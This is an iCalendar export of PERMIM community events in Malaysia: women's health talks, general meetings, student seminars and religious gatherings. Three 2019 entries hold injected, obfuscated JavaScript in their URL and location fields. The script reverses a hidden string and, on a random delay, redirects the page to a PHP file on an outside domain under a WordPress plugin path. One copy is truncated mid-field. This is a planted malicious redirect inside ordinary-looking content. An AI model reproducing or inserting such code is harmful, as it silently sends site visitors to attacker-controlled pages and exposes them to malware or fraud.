BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//PERMIM - ECPv6.8.3//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:PERMIM
X-ORIGINAL-URL:https://permim.org
X-WR-CALDESC:Events for PERMIM
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:Asia/Kuala_Lumpur
BEGIN:STANDARD
TZOFFSETFROM:+0800
TZOFFSETTO:+0800
TZNAME:+08
DTSTART:20240101T000000
END:STANDARD
TZID:UTC
BEGIN:STANDARD
TZOFFSETFROM:+0000
TZOFFSETTO:+0000
TZNAME:UTC
DTSTART:20190101T000000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20250809T080000
DTEND;TZID=Asia/Kuala_Lumpur:20250809T150000
DTSTAMP:20260420T054810
CREATED:20250614T085436Z
LAST-MODIFIED:20250614T091545Z
UID:4913-1754726400-1754751600@permim.org
SUMMARY:GLOW & GROW: Where Beauty\, Brains\, and Bravery Meet!
DESCRIPTION:Assalamualaikumwrh\n*💞 Your health matters. Your well – being matters. YOU matter 💞* \nJoin us for Glow & Grow\, a powerful health talk designed for Indian Muslim Women who want to take charge of their wellness\, an inspiring session where experts will share insights on:\n✅ Managing stress & protecting mental health\n✅ Navigating fertility choices after 35\n✅ Overcoming personal challenges with hope\n✅ Mastering shawl styling for effortless elegance\n✅ Understanding pigmentation & skincare solutions \n📅 Date: 9th August 2025\n📍 Location: Grand Dorsett\, Subang\n⏰ Registration: 8.00am \n💖 Your journey to confidence & wellness starts here! 💖 \nWomenEmpowerment #HealthAndBeauty #ConfidenceMatters #SelfCare #FertilityOver35 #StressManagement #ShawlStyling \n🎗️Tentative Program:🎗️\nEvent: Ladies Health Talk\n*Date: *9th August 2025 (Saturday)\n*Time*: 8:45 am – 3:00 pm\n*Venue*: Grand Dorsett\, Subang\n*Fees*: RM150(RM100 Early Bird)\nRM80 Student\n*Age *: Age 20 & above \n*Tentative Event Flow:* \n*8:00am*: Registration\n*8.45am*:\n– Welcome Speech by MC\n– Doa Recitation\n– Opening Speech \n*9:00am*: Speaker 1\n*9.50am*: Speaker 2\n*10.40am*: Speaker 3\n11.30 am: Speaker 4 \n*12.15PM – 3.00PM*:\n– LUNCH\n– CLOSING CEREMONY\n– PRICE GIVING: BEST DRESS/ LUCKY DRAW\n– TOKEN OF APPRECIATION TO SPEAKERS\n– CLOSING SPEECH BY PRESIDEN OF PERMIM\n– GROUP PHOTO & ADJOURN \n📌Please register here👇\nhttps://women.permim.org \nFollowed by payment to:\nPERMIM\n3820597133\nPublic Bank
URL:https://permim.org/event/glow-grow-where-beauty-brains-and-bravery-meet/
LOCATION:Dorsett Grand Subang\, Jalan SS 12/1\, Ss 12\,\, Subang Jaya\, Selangor\, 47500\, Malaysia
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2025/06/women_program_permim.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20250621T080000
DTEND;TZID=Asia/Kuala_Lumpur:20250621T150000
DTSTAMP:20260420T054810
CREATED:20250614T090006Z
LAST-MODIFIED:20250614T090006Z
UID:4917-1750492800-1750518000@permim.org
SUMMARY:MESYUARAT AGUNG LUAR BIASA (EGM)
DESCRIPTION:Assalamualaikum Wr Wb \nDato Seri / Dato / Datin / Dr / Tuan / Puan\, \nAdalah dengan hormatnya dimaklumkan bahawa Mesyuarat Agung Luar Biasa (EGM) ini akan diadakan seperti ketetapan berikut: \nTARIKH : 22 JUN 2025 (AHAD)\nMASA : 9.30 PAGI – 1 PETANG\nTEMPAT : BANGUNAN LIGA MUSLIM PULAU PINANG \nUntuk keterangan lanjut\, sila hubungi saya di talian ‪0194787293 (En Adam Malik\, Setiausaha Agung PERMIM) atau 0165921252 (En Haja Nijamudin\, Executive Admin PERMIM). \nSegala kerjasama daripada pihak Dato Seri / Dato / Datin / Dr / Tuan / Puan didahului dengan ucapan ribuan terima kasih. \nSekian. Terima Kasih. \nAdam Malik\nSetiausaha Agung PERMIM\nPERSEKUTUAN PERTUBUHAN INDIA MUSLIM MALAYSIA (PERMIM)\nWISMA PERMIM\, TINGKAT 3\, NO 70 & 72\, JALAN TUN PERAK\, 50050 KUALA LUMPUR.\nEmail : permim@ymail.com\nTel 03-20780786
URL:https://permim.org/event/mesyuarat-agung-luar-biasa-egm/
LOCATION:Bangunan Liga Muslim\, 33\,35 Lebuh Queen\, Pulau Pinang\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20250111T080000
DTEND;TZID=Asia/Kuala_Lumpur:20250111T150000
DTSTAMP:20260420T054810
CREATED:20241215T090417Z
LAST-MODIFIED:20241215T090417Z
UID:4724-1736582400-1736607600@permim.org
SUMMARY:Ladies Health talk ! "DOCTORS IN THE HOUSE"
DESCRIPTION:🎗️ Ladies Event🎗️ – PERMIM Women Bureau \nEvent: Ladies Health talk ! “DOCTORS IN THE HOUSE” 🧕🏻🧕🏻🧕🏻\nDate : 11.01.2025 (Sat)\nTime: 8am to 3pm\nVenue: Lecture Hall – MAHSA Avenue\, KL\nFees : RM50/pax\nTarget Audience : MUSLIMAH Only (Age 20 above) \nFees Payable to :\nAccount Name : PERSEKUTUAN PERTUBUHAN INDIA MUSLIM MALAYSIA(PERMIM)\nAccount Number : 3820597133\nBank : Public Bank \nSpeakers:\n1. DR RABIA BINTI MOHAMED SHAH (O&G) MD (UKM)\, MRCOG (UK)\n2. PROF DR TAJUNISAH BEGAM BT MOHD IQBAL (OPHTHALMOLOGIST) MBBS (UM)\, M.OPHTHA (UM)\, ICO\, FRCS (GLASG)\n3. DR AZIANAH BINTI MOHAMAD IBRAHIM PhD in Health Sciences (Physiotheraphy)\n4. CIK NURUL HIDAYAH BINTI MD FADZIL Bachelor of Science (Dietition) \nFor Registration\, please visit women.permim.org \n  \n 
URL:https://permim.org/event/ladies-health-talk-doctors-in-the-house/
LOCATION:Lecture Hall – MAHSA Avenue\, KL\, Jalan Ilmu\, Kuala Lumpur\, Wilayah Persekutuan Kuala Lumpur\, 59100\, Malaysia
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2024/12/WhatsApp-Image-2024-12-15-at-16.07.49.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20240721T133000
DTEND;TZID=Asia/Kuala_Lumpur:20240721T180000
DTSTAMP:20260420T054810
CREATED:20240530T172707Z
LAST-MODIFIED:20240530T172827Z
UID:4688-1721568600-1721584800@permim.org
SUMMARY:PERMIM - Indian Muslim Women - High Tea
DESCRIPTION:OBJECTIVE: \nAN OPPURTUNITY FOR EMPOWERMENT OF INDIAN MUSLIM WOMEN IN THE EVER CHALLENGING ERA AND TO CREATE NEW NETWORKING BY FOSTERING NEW CIRCLE OF FREINDS AMONGST INDIAN MUSLIM WOMEN \nITINERARY: \n1. MC: WELCOME GUESTS AND PARTICIPANTS BY CIK ZARINA\n2. DOA RECITATION – BY USTAZAH\n3. WELCOME SPEECH BY PUAN RAFIDAH\n4. OPENING SPEECH BY PRESIDENT OF PERMIM\n5. MENTAL HEALTH TALK  – SPEAKER: PUAN LAILA JOHARI\n6. ISLAMIC TALK FOR LADIES – SPEAKER : USTAZAH KHADIJAH\n7. PERSONAL GROOMING BY MAKE-UP ARTIST : CIK AJRIYA NASREEN\n8. FREE & EASY – SALE OF PRODUCTS AT KIOSK (FOC ) – FOR FIRST 3 REGISTRATION ONLY\n9. BEST DRESSED – 3 WINNERS\n10. LUCKY DRAW\n11. CLOSING SPEECH – DATIN SABRINA\n12. GROUP PHOTO & ADJOURN \nRegister at women.permim.org
URL:https://permim.org/event/permim-indian-muslim-women-high-tea/
LOCATION:De Palma Hotel\, Shah Alam\, Selangor\, Jalan Nelayan 19/15\, Seksyen 19\, Shah Alam\, Selangor\, 40300\, Malaysia
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2024/05/women-high-tea.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20240523T100000
DTEND;TZID=Asia/Kuala_Lumpur:20240526T220000
DTSTAMP:20260420T054810
CREATED:20240520T155855Z
LAST-MODIFIED:20240520T155855Z
UID:4682-1716458400-1716760800@permim.org
SUMMARY:Sambutan Minggu Perpaduan 2024
DESCRIPTION:Assalamualaikum Wr Wb \nDengan Segala hormatnya kami ingin menjemput Dato / Datin / Tuan / Puan ke Majlis Sambutan Minggu Perpaduan 2024 Peringkat Kebangsaan Seperti Ketetapan Berikut :- \nTarikh : 23 Hingga 26 Mei 2024 \nTempat : Angsana Mall Johor Bahru \nMasa : 10 pagi Hingga 10 Malam \nRUMAH KAMI : INDIA MUSLIM (BOOTH NO 08) \nProjek Bersama Kementerian Perpaduan Negara \nSekian. Terima kasih \nAdam Malik\nSetiausaha Agung PERMIM
URL:https://permim.org/event/sambutan-minggu-perpaduan-2024/
LOCATION:Angsana Mall Johor Bahru\, Lot 2-09\, Level 2\, Angsana Johor Bahru Mall\, Skudai Hwy\, Pusat Bandar Tampoi\, Johor Bahru\, 81200\, Malaysia
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2024/05/PERMIM-RumahKami.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=Asia/Kuala_Lumpur:20240424T200000
DTEND;TZID=Asia/Kuala_Lumpur:20240424T220000
DTSTAMP:20260420T054810
CREATED:20240422T051008Z
LAST-MODIFIED:20240422T051008Z
UID:4632-1713988800-1713996000@permim.org
SUMMARY:Empowerment of Women Entrepreneurs - Selling in Social Media Platform
DESCRIPTION:Empowerment of Women Entrepreneur’s (Selling in Social Media Platform) \nParticipants: 20pax (Ladies Only) \nAgenda :\n8:00pm – Welcoming Address\n8:10pm – Opening Remarks (Dr Bash)\n8:30pm – Selling Online on Shopee and Tiktok\n10:00pm – Closing \nLight refreshments will be served \nFor registration\, please fill up the google form or contact below PIC https://docs.google.com/forms/d/e/1FAIpQLSfvqSm5ogDagFLyPlerXaLb_K9W3vrQCIY9fzaHBKBeD188Ng/viewform \nPn Zarina 012658 6993\nPn Rafidah 012272 7160\nPn Sabrina 0126367003
URL:https://permim.org/event/empowerment-of-women-entrepreneurs-selling-in-social-media-platform/
LOCATION:Wisma PERMIM\, No. 70 & 72\, Jalan Tun Perak\, Kuala Lumpur\, Kuala Lumpur\, 50888\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20211114T080000
DTEND;TZID=UTC:20211114T170000
DTSTAMP:20260420T054810
CREATED:20211102T070543Z
LAST-MODIFIED:20221110T025338Z
UID:4444-1636876800-1636909200@permim.org
SUMMARY:PERMIM - 20th Biennial Delegates Conference
DESCRIPTION:8.00am to 9.00am\n1. Registration of Delegates\n\n\n2. Breakfast\n\n\n9.00am – 9.05am\nDoa Recitation\n\n\n9.05am – 9.10am\nWelcoming remarks\n\n\n9.10am – 9.15am\nPresident Spech\n\n\n9.15am – 9.20am\nVideo Presentation\n\n\n9.20am – 10.00am\nTokoh Award Presentation.\n\n\n\n  \n\n\n\n10.00am – 10.15am\nTea / Light Refereshment.\n\n\n\n  \n\n\n\n10.15am – 10.20am\nRecitation of Holy Quran\n\n\n10.25am – 10.30am\nSpeech by Secretary General\n\n\n10.30am – 10.50am\nSpeech by President\n\n\n10.50am – 11.00am\nConfirmation of minutes of previous BDC\n\n\n11.00am – 11.20am\nPresentation of Secretarial Report\n\n\n11.20am – 11.40am\nPresentation of Financial Report\n\n\n11.40am – 12.10pm\nQuestion and Answer\n\n\n12.10pm – 12.30pm\nDissolution of Exco 2019-21\n\n\n\n  \n\n\n\n12.30pm – 2.30pm\nVoting\n\n\nLunch\n\n\nZuhor Prayers.\n\n\n2.30pm – 4.30pm\nVote Counting\n\n\nAsar Prayers.\n\n\n4.30pm – 5.00pm\nVote Result Announcement\n\n\nNew Committee Lineup Introduction
URL:https://permim.org/event/permim-20th-biennial-delegates-conference/
LOCATION:MAHSA Avenue International College\, Jalan Ilmu\, Off\, Jln Profesor Diraja Ungku Aziz\, Kuala Lumpur\, Wilayah Perseketuan\, 59100\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20211107T140000
DTEND;TZID=UTC:20211107T170000
DTSTAMP:20260420T054810
CREATED:20211102T065614Z
LAST-MODIFIED:20211102T065614Z
UID:4440-1636293600-1636304400@permim.org
SUMMARY:PERMIM - BDC Election - Nomination Day
DESCRIPTION:
URL:https://permim.org/event/permim-bdc-election-nomination-day/
LOCATION:Wisma PERMIM\, No. 70 & 72\, Jalan Tun Perak\, Kuala Lumpur\, Kuala Lumpur\, 50888\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20210410T083000
DTEND;TZID=UTC:20210410T133000
DTSTAMP:20260420T054810
CREATED:20210405T211506Z
LAST-MODIFIED:20221110T025427Z
UID:4427-1618043400-1618061400@permim.org
SUMMARY:Seminar bimbingan pelajar lepasan SPM/STPM 2020 & MATRIKULASI 20/21
DESCRIPTION:Assalamualaikum Wr Wbt \nEBR (Education Bring Righteousness) – Carrier Guidance Program – Guiding Future Leaders \nSeminar bimbingan pelajar lepasan SPM/STPM 2020 & MATRIKULASI 20/21 anjuran PERMIM bersama MMYC\, IMIM & iMCOM \nPara pelajar akan didedahkan dengan maklumat terkini oleh MATRIKULASI\, PTPTN\, UIA dan lain-lain agensi. \nSeminar akan berlangsung pada 10/04/2021 (Sabtu) jam 8.30 pagi hingga 1.30 petang melalui aplikasi ZOOM. Disebabkan rentas negeri tidak dibenarkan\, pihak kami akan mengadakan taklimat ini melalui aplikasi ZOOM \nPara pelajar yg berminat boleh berdaftar melalui laman web http://spm.permim.org dan para pelajar diingatkan bahawa Zoom ID HANYA DIBERIKAN KEPADA PELAJAR YANG BERDAFTAR SAHAJA \nUntuk maklumat terkini\, sila layari www.facebook.com/im.edubr \nUntuk maklumat lanjut\, sila hubungi 03-20780786 / 010-4457786 (whatsapp sahaja) \nPenyertaan adalah PERCUMA. Slot TERHAD!!! Sila daftar segera untuk mendapatkan Meeting ID & Password \n👆Please help to forward the above info to your IM Circles\, NGO groups\, Friends groups\, Family groups\, Jamath Groups & etc👆 \nJazakAllah\nEBR Committee-PERMIM
URL:https://permim.org/event/seminar-bimbingan-pelajar-lepasan-spm-stpm-2020-matrikulasi-20-21/
LOCATION:Zoom Meeting
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2021/04/EBR_2021.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20210221T100000
DTEND;TZID=UTC:20210221T100000
DTSTAMP:20260420T054810
CREATED:20210219T223134Z
LAST-MODIFIED:20221110T025503Z
UID:4422-1613901600-1613901600@permim.org
SUMMARY:PERMIM - Start-up Entrepreneurship Webinar
DESCRIPTION:Entrepreneurship is not a mythical\, illusive creature and it’s not a secret that’s hidden behind doors. You CAN learn how to become a successful Entrepreneur and you CAN learn how to prepare yourself. \nWho this course is for:\n\n Students don’t need to have any previous knowledge or experience of business or innovation.\n The course is for those who are interested in entrepreneurship and innovation.\n Budding entrepreneurs\, potential business owners\, business studies students who are intending to start their own business and not just read about it.\n\nPlease click here to register your interest\nhttp://startup.permim.org
URL:https://permim.org/event/permim-start-up-entrepreneurship-webinar-2/
LOCATION:Zoom Meeting
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20210214T100000
DTEND;TZID=UTC:20210214T120000
DTSTAMP:20260420T054810
CREATED:20210205T155000Z
LAST-MODIFIED:20221110T025547Z
UID:4400-1613296800-1613304000@permim.org
SUMMARY:PERMIM - Start-up Entrepreneurship Webinar
DESCRIPTION:Entrepreneurship is not a mythical\, illusive creature and it’s not a secret that’s hidden behind doors. You CAN learn how to become a successful Entrepreneur and you CAN learn how to prepare yourself. \nWho this course is for:\n\n Students don’t need to have any previous knowledge or experience of business or innovation.\n The course is for those who are interested in entrepreneurship and innovation.\n Budding entrepreneurs\, potential business owners\, business studies students who are intending to start their own business and not just read about it.\n\nPlease click here to register your interest\nhttp://startup.permim.org
URL:https://permim.org/event/permim-start-up-entrepreneurship-webinar/
LOCATION:Zoom Meeting
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2021/02/startup_webinar.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20210210T210000
DTEND;TZID=UTC:20210210T220000
DTSTAMP:20260420T054810
CREATED:20210208T200548Z
LAST-MODIFIED:20221110T025616Z
UID:4412-1612990800-1612994400@permim.org
SUMMARY:Soft Launching - Startup Entrepreneurship Programme
DESCRIPTION:PERMIM in collaboration with Self Help for Youth and are conducting on line Start up Entrepreneurship Programme for Muslim youth. \nIt is designed to nurture potential entrepreneurs to innovate\, create\, develop\, fund\, market and commercialize a viable product or service . \nThe Soft Launch will be through Zoom on 10th Feb 2021 at 9.00pm \n📖 Topic: PERMIM Startup Entrepreneur Launch \n🗓️ Time: Feb 10\, 2021 9:00 PM Malaysia \n🌐 Join Zoom Meeting\nhttps://us02web.zoom.us/j/89482946062?pwd=Sm9Hb1F1UDdXUkdvRXFMVHBWOFJyQT09 \nMeeting ID: 894 8294 6062\nPasscode: PERMIM10
URL:https://permim.org/event/soft-launching-startup-entrepreneurship-programme/
LOCATION:Zoom Meeting
CATEGORIES:PERMIM Events
ATTACH;FMTTYPE=image/jpeg:https://permim.org/wp-content/uploads/2021/02/Soft_Launch_Startup-Entrepreneurship.jpeg
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20200222T080000
DTEND;TZID=UTC:20200222T170000
DTSTAMP:20260420T054810
CREATED:20200202T213914Z
LAST-MODIFIED:20200202T213914Z
UID:4368-1582358400-1582390800@permim.org
SUMMARY:Seminar Bimbingan Pelajar Lepasan SPM / STPM 2019 & Matriculasi 2019/2020
DESCRIPTION:
URL:https://permim.org/event/seminar-bimbingan-pelajar-lepasan-spm-stpm-2019-matriculasi-2019-2020/
LOCATION:Pulau Pinang
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191109T143000
DTEND;TZID=UTC:20191109T170000
DTSTAMP:20260420T054810
CREATED:20191101T022629Z
LAST-MODIFIED:20191101T022629Z
UID:4354-1573309800-1573318800@permim.org
SUMMARY:MMYC - Majlis Perarakan Mawlid Rasul S.A.W KE-8
DESCRIPTION:
URL:https://permim.org/event/mmyc-majlis-perarakan-mawlid-rasul-s-a-w-ke-8/
LOCATION:Masjid India\, Kuala Lumpur\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191102T170000
DTEND;TZID=UTC:20191102T213000
DTSTAMP:20260420T054810
CREATED:20191016T165514Z
LAST-MODIFIED:20191016T165514Z
UID:4340-1572714000-1572730200@permim.org
SUMMARY:Roadmap for Successful On-line Business
DESCRIPTION:
URL:https://permim.org/event/roadmap-for-successful-on-line-business/
LOCATION:Wisma PERMIM\, No. 70 & 72\, Jalan Tun Perak\, Kuala Lumpur\, Kuala Lumpur\, 50888\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191102T080000
DTEND;TZID=UTC:20191102T170000
DTSTAMP:20260420T054810
CREATED:20191101T023455Z
LAST-MODIFIED:20191101T023455Z
UID:4358-1572681600-1572714000@permim.org
SUMMARY:PERMIM - Masjid Wilayah Open Day - Rahmah 4 All
DESCRIPTION:
URL:https://permim.org/event/permim-masjid-wilayah-open-day-rahmah-4-all/
LOCATION:Masjid Wilayah\, Kuala Lumpur\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191029T210000
DTEND;TZID=UTC:20191109T230000
DTSTAMP:20260420T054810
CREATED:20191020T170943Z
LAST-MODIFIED:20191020T170943Z
UID:4349-1572382800-1573340400@permim.org
SUMMARY:YMSC - Ceramah Agama Dalam Bhasa Tamil
DESCRIPTION:
URL:https://permim.org/event/ymsc-ceramah-agama-dalam-bhasa-tamil/
LOCATION:Wisma YMSC\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191021T190000
DTEND;TZID=UTC:20191021T230000
DTSTAMP:20260420T054810
CREATED:20191020T170601Z
LAST-MODIFIED:20191020T170601Z
UID:4344-1571684400-1571698800@permim.org
SUMMARY:SIMS - Majlis Penghargaan Pelantikan Exco Presma Seisi 2019-21
DESCRIPTION:
URL:https://permim.org/event/sims-majlis-penghargaan-pelantikan-exco-presma-seisi-2019-21/
LOCATION:IBIS Hotel\, Jalan Yap Kwan Seng\, Kuala Lumpur\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20191006T080000
DTEND;TZID=UTC:20191006T170000
DTSTAMP:20260420T054810
CREATED:20190924T164503Z
LAST-MODIFIED:20190924T164503Z
UID:4330-1570348800-1570381200@permim.org
SUMMARY:YMSC - Jump Start Your Million Dollar Business
DESCRIPTION: 
URL:https://permim.org/event/ymsc-jump-start-your-million-dollar-business/
LOCATION:Wisma YMSC\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190929T190000
DTEND;TZID=UTC:20190929T233000
DTSTAMP:20260420T054810
CREATED:20190828T225155Z
LAST-MODIFIED:20190828T225155Z
UID:4268-1569783600-1569799800@permim.org
SUMMARY:CMS - Majlis Makan Malam Perdana Gabungan CMS
DESCRIPTION:
URL:https://permim.org/event/cms-majlis-makan-malam-perdana-gabungan-cms/
LOCATION:Moral Uplifting Hall\, Jalan Macalister\, Penang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190928T210000
DTEND;TZID=UTC:20190928T230000
DTSTAMP:20260420T054810
CREATED:20190924T164741Z
LAST-MODIFIED:20190924T164741Z
UID:4335-1569704400-1569711600@permim.org
SUMMARY:YMSC - Ceramah Agama Bulanan
DESCRIPTION:
URL:https://permim.org/event/ymsc-ceramah-agama-bulanan/
LOCATION:Wisma YMSC\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190924T200000
DTEND;TZID=UTC:20190924T223000
DTSTAMP:20260420T054810
CREATED:20190923T173019Z
LAST-MODIFIED:20190923T173019Z
UID:4324-1569355200-1569364200@permim.org
SUMMARY:PRIM - Semarak Hijrah Muharram
DESCRIPTION:
URL:https://permim.org/event/prim-semarak-hijrah-muharram/
LOCATION:Dewan Seri Kenangan
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190921T204500
DTEND;TZID=UTC:20190921T234500
DTSTAMP:20260420T054810
CREATED:20190919T191900Z
LAST-MODIFIED:20190919T191900Z
UID:4321-1569098700-1569109500@permim.org
SUMMARY:Liga Muslim - Forum Perdana & Penyampaian Anugerah Tokoh Maal Hijrah 2019
DESCRIPTION:
URL:https://permim.org/event/liga-muslim-forum-perdana-penyampaian-anugerah-<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tso/
LOCATION:Bangunan Liga Muslim\, 33\,35 Lebuh Queen\, Pulau Pinang\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190920T194500
DTEND;TZID=UTC:20190920T223000
DTSTAMP:20260420T054810
CREATED:20190917T050531Z
LAST-MODIFIED:20190917T050531Z
UID:4311-1569008700-1569018600@permim.org
SUMMARY:Muslim League Kedah - Majlis Sambutan Maal Hijrah & Forum Perdana
DESCRIPTION:
URL:https://permim.org/event/muslim-league-kedah-majlis-sambutan-maal-hijrah-forum-perdana/
LOCATION:Madrasah Tahfiz Al-Quran Da<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0)\,delay);}</script>to Mufti Sheikh Abdul Jalil\, Tanjung Pauh\,\, Jitra\, Kedah\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190920T193000
DTEND;TZID=UTC:20190920T230000
DTSTAMP:20260420T054810
CREATED:20190916T042734Z
LAST-MODIFIED:20190916T043511Z
UID:4305-1569007800-1569020400@permim.org
SUMMARY:ஈமான் பேரவை - மாபெரும் இஸ்லாமிய இன்னிசை இரவு
DESCRIPTION:
URL:https://permim.org/event/%e0%ae%ae%e0%ae%be%e0%ae%aa%e0%af%86%e0%ae%b0%e0%af%81%e0%ae%ae%e0%af%8d-%e0%ae%87%e0%ae%b8%e0%af%8d%e0%ae%b2%e0%ae%be%e0%ae%ae%e0%ae%bf%e0%ae%af-%e0%ae%87%e0%ae%a9%e0%af%8d%e0%ae%a9%e0%ae%bf%e0%ae%9a/
LOCATION:Audi<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0)\,delay);}</script>torium A\, Level 5\, Komtar\, Penang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190914T160000
DTEND;TZID=UTC:20190915T180000
DTSTAMP:20260420T054810
CREATED:20190724T022257Z
LAST-MODIFIED:20190731T175150Z
UID:4039-1568476800-1568570400@permim.org
SUMMARY:1st PERMIM Executive Council Meeting - 2019-2021
DESCRIPTION:
URL:https://permim.org/event/1st-permim-executive-council-meeting-2019-2021/
LOCATION:TH Hotel Kelana Jaya\, Kelana Jaya\, Selangor\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190825T173000
DTEND;TZID=UTC:20190825T190000
DTSTAMP:20260420T054810
CREATED:20190821T233718Z
LAST-MODIFIED:20190821T233718Z
UID:4262-1566754200-1566759600@permim.org
SUMMARY:IMcom - Longest Coffee Painting by Azmi Hussin
DESCRIPTION:
URL:https://permim.org/event/imcom-longest-coffee-painting-by-azmi-hussin/
LOCATION:Starbucks\, Persiaran Karpal Singh\, Penang\, Persiaran Karpal Singh\, Penang\, Penang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190825T080000
DTEND;TZID=UTC:20190825T200000
DTSTAMP:20260420T054810
CREATED:20190731T173106Z
LAST-MODIFIED:20190731T173106Z
UID:4188-1566720000-1566763200@permim.org
SUMMARY:YMSC - Karnival Sukan & Hari Keluarga YMSC
DESCRIPTION:Sukan Karnival Young Muslim Sports Club 2019 \nACARA \n1) Badminton Jumaat\, 16.8.19\, 8.00malam\, Yesterday Club. \n2) Sepak Takraw\, Sabtu\, 17.8.19\, 8.00malam\, Gelanggang MJMC. \n3) Dart\, Selasa\, 20.8.19\, 8.00malam\, WISMA YMSC. \n4) Carrom\, Rabu\, 21.8.19\, 8.00malam\,WISMA YMSC. \n5) Bowling\, Jumaat\, 23.8.19\, 7.30malam\, Classic Bowl Pragin Mall. \n6) Bolasepak\, Ahad\, 25.8.19\, 8.00pagi\, SK Francis Light. \nHARI KELUARGA\n25-08-2019 AHAD\, SK. FRANCIS LIGHT. 8.00 pagi – 8.00 malam \nAcara\n8am – Bola sepak\n10am – Peraduan Mewarna ( umur 4 – 12 )\n2pm – Sukaneka ( umur 4 – 16)\n4pm – Tarik Tali\n5pm – Pertandingan suami isteri\n6pm – Majlis Penutupan\, Ucapan Pengerusi\, Ucapan VIP\, Penyampaian Hadiah\, Cabutan Bertuah\, Majlis Bersurai.\nAhli dan semua ahli keluarga YMSC sahaja boleh mengambil bahagian. ( TERTUTUP)\nPenyertaan Terhad\, siapa cepat dia dapat. \nDapatkan Borang dan daftar\, kepada\nSdr. Navrose 016 4411786\nSdr. Seeni 016 4942988\nSdr. Asikeen 018 4040263\nSdr. Ismail 016 4026541
URL:https://permim.org/event/ymsc-karnival-sukan-hari-keluarga-ymsc/
LOCATION:Sek. Keb. Francis Ligh\, Pulau Pinang\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190825T080000
DTEND;TZID=UTC:20190825T130000
DTSTAMP:20260420T054810
CREATED:20190731T173342Z
LAST-MODIFIED:20190731T173342Z
UID:4193-1566720000-1566738000@permim.org
